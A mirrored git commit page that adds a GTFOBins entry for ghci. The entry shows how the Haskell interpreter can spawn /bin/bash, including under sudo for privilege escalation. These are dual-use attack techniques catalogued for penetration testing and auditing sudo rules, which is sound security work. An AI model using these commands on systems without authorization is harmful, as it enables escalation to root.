mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add ghci binary
This commit is contained in:
parent
106dede9da
commit
373f57fc18
11
_gtfobins/ghci.md
Normal file
11
_gtfobins/ghci.md
Normal file
@ -0,0 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
ghci
|
||||
Prelude> System.Process.callCommand "/bin/bash"
|
||||
sudo:
|
||||
- code: |
|
||||
sudo ghci
|
||||
Prelude> System.Process.callCommand "/bin/bash"
|
||||
---
|
Loading…
Reference in New Issue
Block a user